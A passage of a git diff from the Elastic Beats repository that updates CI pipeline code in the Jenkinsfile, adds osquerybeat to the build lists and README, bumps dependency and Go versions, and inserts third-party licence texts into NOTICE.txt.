CommonName in the new - major version of Beats. *Filebeat* diff --git a/Jenkinsfile b/Jenkinsfile index 8d4cae09d7e..30479827d91 100644 --- a/Jenkinsfile +++ b/Jenkinsfile @@ -9,6 +9,7 @@ pipeline { AWS_REGION = "${params.awsRegion}" REPO = 'beats' BASE_DIR = "src/github.com/elastic/${env.REPO}" + DOCKERHUB_SECRET = 'secret/observability-team/ci/elastic-observability-dockerhub' DOCKER_ELASTIC_SECRET = 'secret/observability-team/ci/docker-registry/prod' DOCKER_COMPOSE_VERSION = "1.21.0" DOCKER_REGISTRY = 'docker.elastic.co' @@ -72,18 +73,20 @@ pipeline { GOFLAGS = '-mod=readonly' } steps { - withGithubNotify(context: "Lint") { - withBeatsEnv(archive: false, id: "lint") { - dumpVariables() - setEnvVar('VERSION', sh(label: 'Get beat version', script: 'make get-version', returnStdout: true)?.trim()) - whenTrue(env.ONLY_DOCS == 'true') { - cmd(label: "make check", script: "make check") - } - whenTrue(env.ONLY_DOCS == 'false') { - cmd(label: "make check-python", script: "make check-python") - cmd(label: "make check-go", script: "make check-go") - cmd(label: "make notice", script: "make notice") - cmd(label: "Check for changes", script: "make check-no-changes") + stageStatusCache(id: 'Lint'){ + withGithubNotify(context: "Lint") { + withBeatsEnv(archive: false, id: "lint") { + dumpVariables() + setEnvVar('VERSION', sh(label: 'Get beat version', script: 'make get-version', returnStdout: true)?.trim()) + whenTrue(env.ONLY_DOCS == 'true') { + cmd(label: "make check", script: "make check") + } + whenTrue(env.ONLY_DOCS == 'false') { + cmd(label: "make check-python", script: "make check-python") + cmd(label: "make check-go", script: "make check-go") + cmd(label: "make notice", script: "make notice") + cmd(label: "Check for changes", script: "make check-no-changes") + } } } } @@ -211,7 +214,7 @@ def generateStages(Map args = [:]) { } def cloud(Map args = [:]) { - withNode(args.label) { + withNode(labels: args.label, sleepMin: 30, sleepMax: 200, forceWorkspace: true){ startCloudTestEnv(name: args.directory, dirs: args.dirs) } withCloudTestEnv() { @@ -226,7 +229,7 @@ def cloud(Map args = [:]) { def k8sTest(Map args = [:]) { def versions = args.versions versions.each{ v -> - withNode(args.label) { + withNode(labels: args.label, sleepMin: 30, sleepMax: 200, forceWorkspace: true){ stage("${args.context} ${v}"){ withEnv(["K8S_VERSION=${v}", "KIND_VERSION=v0.7.0", "KUBECONFIG=${env.WORKSPACE}/kubecfg"]){ withGithubNotify(context: "${args.context} ${v}") { @@ -478,7 +481,7 @@ def target(Map args = [:]) { def isE2E = args.e2e?.get('enabled', false) def isPackaging = args.get('package', false) def dockerArch = args.get('dockerArch', 'amd64') - withNode(args.label) { + withNode(labels: args.label, sleepMin: 30, sleepMax: 200, forceWorkspace: true){ withGithubNotify(context: "${context}") { withBeatsEnv(archive: true, withModule: withModule, directory: directory, id: args.id) { dumpVariables() @@ -505,22 +508,6 @@ def target(Map args = [:]) { } } -/** -* This method wraps the node call for two reasons: -* 1. with some latency to avoid the known issue with the scalabitity in gobld. -* 2. allocate a new workspace to workaround the flakiness of windows workers with deleteDir -*/ -def withNode(String label, Closure body) { - sleep randomNumber(min: 10, max: 200) - // this should workaround the existing issue with reusing workers with the Gobld - def uuid = UUID.randomUUID().toString() - node(label) { - ws("workspace/${JOB_BASE_NAME}-${BUILD_NUMBER}-${uuid}") { - body() - } - } -} - /** * This method wraps all the environment setup and pre-requirements to run any commands. */ @@ -587,6 +574,7 @@ def withBeatsEnv(Map args = [:], Closure body) { ]) { if(isDockerInstalled()) { dockerLogin(secret: "${DOCKER_ELASTIC_SECRET}", registry: "${DOCKER_REGISTRY}") + dockerLogin(secret: "${DOCKERHUB_SECRET}", registry: 'docker.io') } dir("${env.BASE_DIR}") { installTools(args) @@ -736,10 +724,11 @@ def archiveTestOutput(Map args = [:]) { * disk space of the jenkins instance */ def tarAndUploadArtifacts(Map args = [:]) { - tar(file: args.file, dir: args.location, archive: false, allowMissing: true) + def fileName = args.file.replaceAll('[^A-Za-z-0-9]','-') + tar(file: fileName, dir: args.location, archive: false, allowMissing: true) googleStorageUploadExt(bucket: "gs://${JOB_GCS_BUCKET}/${env.JOB_NAME}-${env.BUILD_ID}", credentialsId: "${JOB_GCS_EXT_CREDENTIALS}", - pattern: "${args.file}", + pattern: "${fileName}", sharedPublicly: true) } @@ -956,40 +945,42 @@ class RunCommand extends co.elastic.beats.BeatsFunction { super(args) } public run(Map args = [:]){ - def withModule = args.content.get('withModule', false) - if(args?.content?.containsKey('make')) { - steps.target(context: args.context, command: args.content.make, directory: args.project, label: args.label, withModule: withModule, isMage: false, id: args.id) - } - if(args?.content?.containsKey('mage')) { - steps.target(context: args.context, command: args.content.mage, directory: args.project, label: args.label, withModule: withModule, isMage: true, id: args.id) - } - if(args?.content?.containsKey('packaging-arm')) { - steps.packagingArm(context: args.context, - command: args.content.get('packaging-arm'), - directory: args.project, - label: args.label, - isMage: true, - id: args.id, - e2e: args.content.get('e2e'), - package: true, - dockerArch: 'arm64') - } - if(args?.content?.containsKey('packaging-linux')) { - steps.packagingLinux(context: args.context, - command: args.content.get('packaging-linux'), + steps.stageStatusCache(args){ + def withModule = args.content.get('withModule', false) + if(args?.content?.containsKey('make')) { + steps.target(context: args.context, command: args.content.make, directory: args.project, label: args.label, withModule: withModule, isMage: false, id: args.id) + } + if(args?.content?.containsKey('mage')) { + steps.target(context: args.context, command: args.content.mage, directory: args.project, label: args.label, withModule: withModule, isMage: true, id: args.id) + } + if(args?.content?.containsKey('packaging-arm')) { + steps.packagingArm(context: args.context, + command: args.content.get('packaging-arm'), directory: args.project, label: args.label, isMage: true, id: args.id, e2e: args.content.get('e2e'), package: true, - dockerArch: 'amd64') - } - if(args?.content?.containsKey('k8sTest')) { - steps.k8sTest(context: args.context, versions: args.content.k8sTest.split(','), label: args.label, id: args.id) - } - if(args?.content?.containsKey('cloud')) { - steps.cloud(context: args.context, command: args.content.cloud, directory: args.project, label: args.label, withModule: withModule, dirs: args.content.dirs, id: args.id) + dockerArch: 'arm64') + } + if(args?.content?.containsKey('packaging-linux')) { + steps.packagingLinux(context: args.context, + command: args.content.get('packaging-linux'), + directory: args.project, + label: args.label, + isMage: true, + id: args.id, + e2e: args.content.get('e2e'), + package: true, + dockerArch: 'amd64') + } + if(args?.content?.containsKey('k8sTest')) { + steps.k8sTest(context: args.context, versions: args.content.k8sTest.split(','), label: args.label, id: args.id) + } + if(args?.content?.containsKey('cloud')) { + steps.cloud(context: args.context, command: args.content.cloud, directory: args.project, label: args.label, withModule: withModule, dirs: args.content.dirs, id: args.id) + } } } } diff --git a/Jenkinsfile.yml b/Jenkinsfile.yml index 284000da86f..35f682a9714 100644 --- a/Jenkinsfile.yml +++ b/Jenkinsfile.yml @@ -17,6 +17,7 @@ projects: - "x-pack/heartbeat" - "x-pack/libbeat" - "x-pack/metricbeat" + - "x-pack/osquerybeat" - "x-pack/packetbeat" - "x-pack/winlogbeat" - "dev-tools" diff --git a/Makefile b/Makefile index 6080779c7bb..1b6f0251f53 100644 --- a/Makefile +++ b/Makefile @@ -1,6 +1,6 @@ BUILD_DIR=$(CURDIR)/build COVERAGE_DIR=$(BUILD_DIR)/coverage -BEATS?=auditbeat filebeat heartbeat journalbeat metricbeat packetbeat winlogbeat x-pack/functionbeat x-pack/elastic-agent +BEATS?=auditbeat filebeat heartbeat journalbeat metricbeat packetbeat winlogbeat x-pack/functionbeat x-pack/elastic-agent x-pack/osquerybeat PROJECTS=libbeat $(BEATS) PROJECTS_ENV=libbeat filebeat metricbeat PYTHON_ENV?=$(BUILD_DIR)/python-env diff --git a/NOTICE.txt b/NOTICE.txt index 6e184407644..db86aec50f9 100644 --- a/NOTICE.txt +++ b/NOTICE.txt @@ -6103,11 +6103,11 @@ Contents of probable licence file $GOMODCACHE/github.com/elastic/ecs@v1.8.0/LICE -------------------------------------------------------------------------------- Dependency : github.com/elastic/elastic-agent-client/v7 -Version: v7.0.0-20200709172729-d43b7ad5833a +Version: v7.0.0-20210308165121-7dd05ee2b5a5 Licence type (autodetected): Elastic -------------------------------------------------------------------------------- -Contents of probable licence file $GOMODCACHE/github.com/elastic/elastic-agent-client/v7@v7.0.0-20200709172729-d43b7ad5833a/LICENSE.txt: +Contents of probable licence file $GOMODCACHE/github.com/elastic/elastic-agent-client/v7@v7.0.0-20210308165121-7dd05ee2b5a5/LICENSE.txt: ELASTIC LICENSE AGREEMENT @@ -8299,11 +8299,11 @@ Contents of probable licence file $GOMODCACHE/github.com/elastic/go-ucfg@v0.8.3/ -------------------------------------------------------------------------------- Dependency : github.com/elastic/gosigar -Version: v0.14.0 +Version: v0.14.1 Licence type (autodetected): Apache-2.0 -------------------------------------------------------------------------------- -Contents of probable licence file $GOMODCACHE/github.com/elastic/gosigar@v0.14.0/LICENSE: +Contents of probable licence file $GOMODCACHE/github.com/elastic/gosigar@v0.14.1/LICENSE: Apache License Version 2.0, January 2004 @@ -9446,11 +9446,11 @@ OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. -------------------------------------------------------------------------------- Dependency : github.com/golang/protobuf -Version: v1.4.2 +Version: v1.4.3 Licence type (autodetected): BSD-3-Clause -------------------------------------------------------------------------------- -Contents of probable licence file $GOMODCACHE/github.com/golang/protobuf@v1.4.2/LICENSE: +Contents of probable licence file $GOMODCACHE/github.com/golang/protobuf@v1.4.3/LICENSE: Copyright 2010 The Go Authors. All rights reserved. @@ -9995,11 +9995,11 @@ OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. -------------------------------------------------------------------------------- Dependency : github.com/google/uuid -Version: v1.1.2-0.20190416172445-c2e93f3ae59f +Version: v1.1.2 Licence type (autodetected): BSD-3-Clause -------------------------------------------------------------------------------- -Contents of probable licence file $GOMODCACHE/github.com/google/uuid@v1.1.2-0.20190416172445-c2e93f3ae59f/LICENSE: +Contents of probable licence file $GOMODCACHE/github.com/google/uuid@v1.1.2/LICENSE: Copyright (c) 2009,2014 Google Inc. All rights reserved. @@ -11809,6 +11809,24 @@ freely, subject to the following restrictions: distribution. +-------------------------------------------------------------------------------- +Dependency : github.com/kolide/osquery-go +Version: v0.0.0-20200604192029-b019be7063ac +Licence type (autodetected): MIT +-------------------------------------------------------------------------------- + +Contents of probable licence file $GOMODCACHE/github.com/kolide/osquery-go@v0.0.0-20200604192029-b019be7063ac/LICENSE: + +MIT License + +Copyright 2017 Kolide Inc. + +Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions: + +The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software. + +THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. + -------------------------------------------------------------------------------- Dependency : github.com/lib/pq Version: v1.1.2-0.20190507191818-2ff3cb3adc01 @@ -16122,11 +16140,11 @@ OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. -------------------------------------------------------------------------------- Dependency : golang.org/x/net -Version: v0.0.0-20200904194848-62affa334b73 +Version: v0.0.0-20210226172049-e18ecbb05110 Licence type (autodetected): BSD-3-Clause -------------------------------------------------------------------------------- -Contents of probable licence file $GOMODCACHE/golang.org/x/net@v0.0.0-20200904194848-62affa334b73/LICENSE: +Contents of probable licence file $GOMODCACHE/golang.org/x/net@v0.0.0-20210226172049-e18ecbb05110/LICENSE: Copyright (c) 2009 The Go Authors. All rights reserved. @@ -16233,11 +16251,11 @@ OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. -------------------------------------------------------------------------------- Dependency : golang.org/x/sys -Version: v0.0.0-20201009025420-dfb3f7c4e634 +Version: v0.0.0-20210308170721-88b6017d0656 Licence type (autodetected): BSD-3-Clause -------------------------------------------------------------------------------- -Contents of probable licence file $GOMODCACHE/golang.org/x/sys@v0.0.0-20201009025420-dfb3f7c4e634/LICENSE: +Contents of probable licence file $GOMODCACHE/golang.org/x/sys@v0.0.0-20210308170721-88b6017d0656/LICENSE: Copyright (c) 2009 The Go Authors. All rights reserved. @@ -16270,11 +16288,11 @@ OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. -------------------------------------------------------------------------------- Dependency : golang.org/x/text -Version: v0.3.3 +Version: v0.3.5 Licence type (autodetected): BSD-3-Clause -------------------------------------------------------------------------------- -Contents of probable licence file $GOMODCACHE/golang.org/x/text@v0.3.3/LICENSE: +Contents of probable licence file $GOMODCACHE/golang.org/x/text@v0.3.5/LICENSE: Copyright (c) 2009 The Go Authors. All rights reserved. @@ -16418,11 +16436,11 @@ OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. -------------------------------------------------------------------------------- Dependency : google.golang.org/genproto -Version: v0.0.0-20200526211855-cb27e3aa2013 +Version: v0.0.0-20210303154014-9728d6b83eeb Licence type (autodetected): Apache-2.0 -------------------------------------------------------------------------------- -Contents of probable licence file $GOMODCACHE/google.golang.org/genproto@v0.0.0-20200526211855-cb27e3aa2013/LICENSE: +Contents of probable licence file $GOMODCACHE/google.golang.org/genproto@v0.0.0-20210303154014-9728d6b83eeb/LICENSE: Apache License @@ -16842,11 +16860,11 @@ Contents of probable licence file $GOMODCACHE/google.golang.org/grpc@v1.29.1/LIC -------------------------------------------------------------------------------- Dependency : google.golang.org/protobuf -Version: v1.24.0 +Version: v1.25.0 Licence type (autodetected): BSD-3-Clause -------------------------------------------------------------------------------- -Contents of probable licence file $GOMODCACHE/google.golang.org/protobuf@v1.24.0/LICENSE: +Contents of probable licence file $GOMODCACHE/google.golang.org/protobuf@v1.25.0/LICENSE: Copyright (c) 2018 The Go Authors. All rights reserved. @@ -21090,6 +21108,322 @@ The above copyright notice and this permission notice shall be included in all c THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. +-------------------------------------------------------------------------------- +Dependency : github.com/apache/thrift +Version: v0.13.1-0.20200603211036-eac4d0c79a5f +Licence type (autodetected): Apache-2.0 +-------------------------------------------------------------------------------- + +Contents of probable licence file $GOMODCACHE/github.com/apache/thrift@v0.13.1-0.20200603211036-eac4d0c79a5f/LICENSE: + + + Apache License + Version 2.0, January 2004 + http://www.apache.org/licenses/ + + TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION + + 1. Definitions. + + "License" shall mean the terms and conditions for use, reproduction, + and distribution as defined by Sections 1 through 9 of this document. + + "Licensor" shall mean the copyright owner or entity authorized by + the copyright owner that is granting the License. + + "Legal Entity" shall mean the union of the acting entity and all + other entities that control, are controlled by, or are under common + control with that entity. For the purposes of this definition, + "control" means (i) the power, direct or indirect, to cause the + direction or management of such entity, whether by contract or + otherwise, or (ii) ownership of fifty percent (50%) or more of the + outstanding shares, or (iii) beneficial ownership of such entity. + + "You" (or "Your") shall mean an individual or Legal Entity + exercising permissions granted by this License. + + "Source" form shall mean the preferred form for making modifications, + including but not limited to software source code, documentation + source, and configuration files. + + "Object" form shall mean any form resulting from mechanical + transformation or translation of a Source form, including but + not limited to compiled object code, generated documentation, + and conversions to other media types. + + "Work" shall mean the work of authorship, whether in Source or + Object form, made available under the License, as indicated by a + copyright notice that is included in or attached to the work + (an example is provided in the Appendix below). + + "Derivative Works" shall mean any work, whether in Source or Object + form, that is based on (or derived from) the Work and for which the + editorial revisions, annotations, elaborations, or other modifications + represent, as a whole, an original work of authorship. For the purposes + of this License, Derivative Works shall not include works that remain + separable from, or merely link (or bind by name) to the interfaces of, + the Work and Derivative Works thereof. + + "Contribution" shall mean any work of authorship, including + the original version of the Work and any modifications or additions + to that Work or Derivative Works thereof, that is intentionally + submitted to Licensor for inclusion in the Work by the copyright owner + or by an individual or Legal Entity authorized to submit on behalf of + the copyright owner. For the purposes of this definition, "submitted" + means any form of electronic, verbal, or written communication sent + to the Licensor or its representatives, including but not limited to + communication on electronic mailing lists, source code control systems, + and issue tracking systems that are managed by, or on behalf of, the + Licensor for the purpose of discussing and improving the Work, but + excluding communication that is conspicuously marked or otherwise + designated in writing by the copyright owner as "Not a Contribution." + + "Contributor" shall mean Licensor and any individual or Legal Entity + on behalf of whom a Contribution has been received by Licensor and + subsequently incorporated within the Work. + + 2. Grant of Copyright License. Subject to the terms and conditions of + this License, each Contributor hereby grants to You a perpetual, + worldwide, non-exclusive, no-charge, royalty-free, irrevocable + copyright license to reproduce, prepare Derivative Works of, + publicly display, publicly perform, sublicense, and distribute the + Work and such Derivative Works in Source or Object form. + + 3. Grant of Patent License. Subject to the terms and conditions of + this License, each Contributor hereby grants to You a perpetual, + worldwide, non-exclusive, no-charge, royalty-free, irrevocable + (except as stated in this section) patent license to make, have made, + use, offer to sell, sell, import, and otherwise transfer the Work, + where such license applies only to those patent claims licensable + by such Contributor that are necessarily infringed by their + Contribution(s) alone or by combination of their Contribution(s) + with the Work to which such Contribution(s) was submitted. If You + institute patent litigation against any entity (including a + cross-claim or counterclaim in a lawsuit) alleging that the Work + or a Contribution incorporated within the Work constitutes direct + or contributory patent infringement, then any patent licenses + granted to You under this License for that Work shall terminate + as of the date such litigation is filed. + + 4. Redistribution. You may reproduce and distribute copies of the + Work or Derivative Works thereof in any medium, with or without + modifications, and in Source or Object form, provided that You + meet the following conditions: + + (a) You must give any other recipients of the Work or + Derivative Works a copy of this License; and + + (b) You must cause any modified files to carry prominent notices + stating that You changed the files; and + + (c) You must retain, in the Source form of any Derivative Works + that You distribute, all copyright, patent, trademark, and + attribution notices from the Source form of the Work, + excluding those notices that do not pertain to any part of + the Derivative Works; and + + (d) If the Work includes a "NOTICE" text file as part of its + distribution, then any Derivative Works that You distribute must + include a readable copy of the attribution notices contained + within such NOTICE file, excluding those notices that do not + pertain to any part of the Derivative Works, in at least one + of the following places: within a NOTICE text file distributed + as part of the Derivative Works; within the Source form or + documentation, if provided along with the Derivative Works; or, + within a display generated by the Derivative Works, if and + wherever such third-party notices normally appear. The contents + of the NOTICE file are for informational purposes only and + do not modify the License. You may add Your own attribution + notices within Derivative Works that You distribute, alongside + or as an addendum to the NOTICE text from the Work, provided + that such additional attribution notices cannot be construed + as modifying the License. + + You may add Your own copyright statement to Your modifications and + may provide additional or different license terms and conditions + for use, reproduction, or distribution of Your modifications, or + for any such Derivative Works as a whole, provided Your use, + reproduction, and distribution of the Work otherwise complies with + the conditions stated in this License. + + 5. Submission of Contributions. Unless You explicitly state otherwise, + any Contribution intentionally submitted for inclusion in the Work + by You to the Licensor shall be under the terms and conditions of + this License, without any additional terms or conditions. + Notwithstanding the above, nothing herein shall supersede or modify + the terms of any separate license agreement you may have executed + with Licensor regarding such Contributions. + + 6. Trademarks. This License does not grant permission to use the trade + names, trademarks, service marks, or product names of the Licensor, + except as required for reasonable and customary use in describing the + origin of the Work and reproducing the content of the NOTICE file. + + 7. Disclaimer of Warranty. Unless required by applicable law or + agreed to in writing, Licensor provides the Work (and each + Contributor provides its Contributions) on an "AS IS" BASIS, + WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or + implied, including, without limitation, any warranties or conditions + of TITLE, NON-INFRINGEMENT, MERCHANTABILITY, or FITNESS FOR A + PARTICULAR PURPOSE. You are solely responsible for determining the + appropriateness of using or redistributing the Work and assume any + risks associated with Your exercise of permissions under this License. + + 8. Limitation of Liability. In no event and under no legal theory, + whether in tort (including negligence), contract, or otherwise, + unless required by applicable law (such as deliberate and grossly + negligent acts) or agreed to in writing, shall any Contributor be + liable to You for damages, including any direct, indirect, special, + incidental, or consequential damages of any character arising as a + result of this License or out of the use or inability to use the + Work (including but not limited to damages for loss of goodwill, + work stoppage, computer failure or malfunction, or any and all + other commercial damages or losses), even if such Contributor + has been advised of the possibility of such damages. + + 9. Accepting Warranty or Additional Liability. While redistributing + the Work or Derivative Works thereof, You may choose to offer, + and charge a fee for, acceptance of support, warranty, indemnity, + or other liability obligations and/or rights consistent with this + License. However, in accepting such obligations, You may act only + on Your own behalf and on Your sole responsibility, not on behalf + of any other Contributor, and only if You agree to indemnify, + defend, and hold each Contributor harmless for any liability + incurred by, or claims asserted against, such Contributor by reason + of your accepting any such warranty or additional liability. + + END OF TERMS AND CONDITIONS + + APPENDIX: How to apply the Apache License to your work. + + To apply the Apache License to your work, attach the following + boilerplate notice, with the fields enclosed by brackets "[]" + replaced with your own identifying information. (Don't include + the brackets!) The text should be enclosed in the appropriate + comment syntax for the file format. We also recommend that a + file or class name and description of purpose be included on the + same "printed page" as the copyright notice for easier + identification within third-party archives. + + Copyright [yyyy] [name of copyright owner] + + Licensed under the Apache License, Version 2.0 (the "License"); + you may not use this file except in compliance with the License. + You may obtain a copy of the License at + + http://www.apache.org/licenses/LICENSE-2.0 + + Unless required by applicable law or agreed to in writing, software + distributed under the License is distributed on an "AS IS" BASIS, + WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + See the License for the specific language governing permissions and + limitations under the License. + +-------------------------------------------------- +SOFTWARE DISTRIBUTED WITH THRIFT: + +The Apache Thrift software includes a number of subcomponents with +separate copyright notices and license terms. Your use of the source +code for the these subcomponents is subject to the terms and +conditions of the following licenses. + +-------------------------------------------------- +Portions of the following files are licensed under the MIT License: + + lib/erl/src/Makefile.am + +Please see doc/otp-base-license.txt for the full terms of this license. + +-------------------------------------------------- +For the aclocal/ax_boost_base.m4 and contrib/fb303/aclocal/ax_boost_base.m4 components: + +# Copyright (c) 2007 Thomas Porschberg +# +# Copying and distribution of this file, with or without +# modification, are permitted in any medium without royalty provided +# the copyright notice and this notice are preserved. + +-------------------------------------------------- +For the lib/nodejs/lib/thrift/json_parse.js: + +/* + json_parse.js + 2015-05-02 + Public Domain. + NO WARRANTY EXPRESSED OR IMPLIED. USE AT YOUR OWN RISK. + +*/ +(By Douglas Crockford ) + +-------------------------------------------------- +For lib/cpp/src/thrift/windows/SocketPair.cpp + +/* socketpair.c + * Copyright 2007 by Nathan C. Myers ; some rights reserved. + * This code is Free Software. It may be copied freely, in original or + * modified form, subject only to the restrictions that (1) the author is + * relieved from all responsibilities for any use for any purpose, and (2) + * this copyright notice must be retained, unchanged, in its entirety. If + * for any reason the author might be held responsible for any consequences + * of copying or use, license is withheld. + */ + + +-------------------------------------------------- +For lib/py/compat/win32/stdint.h + +// ISO C9x compliant stdint.h for Microsoft Visual Studio +// Based on ISO/IEC 9899:TC2 Committee draft (May 6, 2005) WG14/N1124 +// +// Copyright (c) 2006-2008 Alexander Chemeris +// +// Redistribution and use in source and binary forms, with or without +// modification, are permitted provided that the following conditions are met: +// +// 1. Redistributions of source code must retain the above copyright notice, +// this list of conditions and the following disclaimer. +// +// 2. Redistributions in binary form must reproduce the above copyright +// notice, this list of conditions and the following disclaimer in the +// documentation and/or other materials provided with the distribution. +// +// 3. The name of the author may be used to endorse or promote products +// derived from this software without specific prior written permission. +// +// THIS SOFTWARE IS PROVIDED BY THE AUTHOR ``AS IS'' AND ANY EXPRESS OR IMPLIED +// WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF +// MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO +// EVENT SHALL THE AUTHOR BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, +// SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, +// PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; +// OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, +// WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR +// OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF +// ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. +// +/////////////////////////////////////////////////////////////////////////////// + + +-------------------------------------------------- +Codegen template in t_html_generator.h + +* Bootstrap v2.0.3 +* +* Copyright 2012 Twitter, Inc +* Licensed under the Apache License v2.0 +* http://www.apache.org/licenses/LICENSE-2.0 +* +* Designed and built with all the love in the world @twitter by @mdo and @fat. + +--------------------------------------------------- +For t_cl_generator.cc + + * Copyright (c) 2008- Patrick Collison + * Copyright (c) 2006- Facebook + +--------------------------------------------------- + + -------------------------------------------------------------------------------- Dependency : github.com/apoydence/eachers Version: v0.0.0-20181020210610-23942921fe77 @@ -40479,6 +40813,43 @@ THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. +-------------------------------------------------------------------------------- +Dependency : golang.org/x/term +Version: v0.0.0-20201126162022-7de9c90e9dd1 +Licence type (autodetected): BSD-3-Clause +-------------------------------------------------------------------------------- + +Contents of probable licence file $GOMODCACHE/golang.org/x/term@v0.0.0-20201126162022-7de9c90e9dd1/LICENSE: + +Copyright (c) 2009 The Go Authors. All rights reserved. + +Redistribution and use in source and binary forms, with or without +modification, are permitted provided that the following conditions are +met: + + * Redistributions of source code must retain the above copyright +notice, this list of conditions and the following disclaimer. + * Redistributions in binary form must reproduce the above +copyright notice, this list of conditions and the following disclaimer +in the documentation and/or other materials provided with the +distribution. + * Neither the name of Google Inc. nor the names of its +contributors may be used to endorse or promote products derived from +this software without specific prior written permission. + +THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS +"AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT +LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR +A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT +OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, +SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT +LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, +DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY +THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT +(INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE +OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. + + -------------------------------------------------------------------------------- Dependency : golang.org/x/xerrors Version: v0.0.0-20200804184101-5ec99f83aff1 diff --git a/README.md b/README.md index 7fac58c7d16..2d67eeea591 100644 --- a/README.md +++ b/README.md @@ -4,7 +4,7 @@ # Beats - The Lightweight Shippers of the Elastic Stack -The [Beats](https://www.elastic.co/products/beats) are lightweight data +The [Beats](https://www.elastic.co/beats) are lightweight data shippers, written in Go, that you install on your servers to capture all sorts of operational data (think of logs, metrics, or network packet data). The Beats send the operational data to Elasticsearch, either directly or via Logstash, so @@ -27,6 +27,7 @@ Beat | Description [Metricbeat](https://github.com/elastic/beats/tree/master/metricbeat) | Fetches sets of metrics from the operating system and services [Packetbeat](https://github.com/elastic/beats/tree/master/packetbeat) | Monitors the network and applications by sniffing packets [Winlogbeat](https://github.com/elastic/beats/tree/master/winlogbeat) | Fetches and ships Windows Event logs +[Osquerybeat](https://github.com/elastic/beats/tree/master/x-pack/osquerybeat) | Runs Osquery and manages interraction with it. In addition to the above Beats, which are officially supported by [Elastic](https://elastic.co), the community has created a set of other Beats diff --git a/auditbeat/Dockerfile b/auditbeat/Dockerfile index 4435e1aa944..54df8f43190 100644 --- a/auditbeat/Dockerfile +++ b/auditbeat/Dockerfile @@ -1,4 +1,4 @@ -FROM golang:1.15.9 +FROM golang:1.15.10 RUN \ apt-get update \ diff --git a/auditbeat/cmd/root.go b/auditbeat/cmd/root.go index 0766f05b05c..6328ea0bb3d 100644 --- a/auditbeat/cmd/root.go +++ b/auditbeat/cmd/root.go @@ -35,7 +35,7 @@ const ( Name = "auditbeat" // ecsVersion specifies the version of ECS that Auditbeat is implementing. - ecsVersion = "1.8.0" + ecsVersion = "1.9.0" ) // RootCmd for running auditbeat. diff --git 